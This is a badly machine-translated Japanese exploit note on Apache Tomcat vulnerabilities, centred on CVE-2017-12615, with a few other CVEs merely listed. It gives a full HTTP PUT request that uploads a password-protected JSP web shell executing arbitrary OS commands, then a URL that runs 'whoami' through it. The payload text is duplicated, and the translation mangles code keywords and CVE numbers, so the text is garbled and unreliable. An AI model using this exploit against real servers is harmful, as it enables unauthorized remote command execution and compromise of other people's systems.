弱いパスワード管理の背景のTomcat
Tomcatは任意のファイルの脆弱性を書きます
CVE-2019-0232
CVE-2019-0211
CVE-2017から12615
DATE 2017 の範囲 のApache Tomcat 7.0。 0 - 7.0。 81 前提条件 のweb.xml(1)(2)HTTPプロトコルのサポートPUT要求の再生
(1)契約
PUT /dark.jsp HTTP / 1.1
ホスト:xx.xx.163.193:8083
のUser-Agent:Mozillaの/ 5.0(Windows NTの10.0; Win64の、x64の、RV:71.0)のGecko / 20100101 Firefoxの/ 71.0
受け入れ:text / htmlで、アプリケーション/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
受け入れ言語:ZH-CN、ZH; Q = 0.8、ZH-TW; Q = 0.7、ZH-HKを、Q = 0.5、 EN-US; Q = 0.3、EN; Q = 0.2
受け入れエンコード:gzipで、デフレート
DNT:1つの
接続:キープアライブ
のアップグレード-安全でない-要求:1
プラグマ:キャッシュなし
のCache-Control:キャッシュなしの
コンテンツ長:1039
<%@ページ言語= "javaの" インポート= "java.utilの。*、java.io. *" pageEncodingは= "UTF-8" %> <%!公共の静的な文字列excuteCmd(列C){StringBuilderのライン=新しいStringBuilderの();試み{プロセスプロ= Runtime.getRuntime()EXEC(C); BufferedReaderのBUF =新しいBufferedReaderの(新しいInputStreamReaderの(pro.getInputStream()));文字列のTEMP = NULL;一方((TEMP = buf.readLine( ))!= NULL){line.append(TEMP
<%@ページ言語= "javaの" インポート= "java.utilの。*、java.io. *" pageEncodingは= "UTF-8" %> <%!公共の静的な文字列excuteCmd(列C){StringBuilderのライン=新しいStringBuilderの();試み{プロセスプロ= Runtime.getRuntime()EXEC(C); BufferedReaderのBUF =新しいBufferedReaderの(新しいInputStreamReaderの(pro.getInputStream()));文字列のTEMP = NULL;一方((TEMP = buf.readLine( ))!= NULL){line.append(TEMP
+ "\\ N");} buf.close();}キャッチ(例外e){line.append(e.getMessage());}戻りline.toString();}%> <%であれば(「023 」.equals(request.getParameter( "PWD"))&&! ""。(request.getParameter( "CMD"))){out.printlnを( "<PRE>" + excuteCmd(request.getParameter( "CMD" に等しいです))+ "</ PRE>");}他{out.printlnを( ":-)");}%>
(2)コマンド実行
xx.xx.163.193 :? 8083 / dark.jsp&PWD = 023&CMD = WHOAMI
CVE-2017から12616
の範囲:Apache Tomcatの7.0.0 - 7.0.80
前提条件:server.xmlの-VirtualDirContext-デフォルトなし-手動で追加
CVE-2017から12617-TomcatのRCE
のApache Tomcat 7.0.0 - 7.0.81
サービスの脆弱性Apache Tomcatのリモートブロック要求拒否(CVE-2014から0075)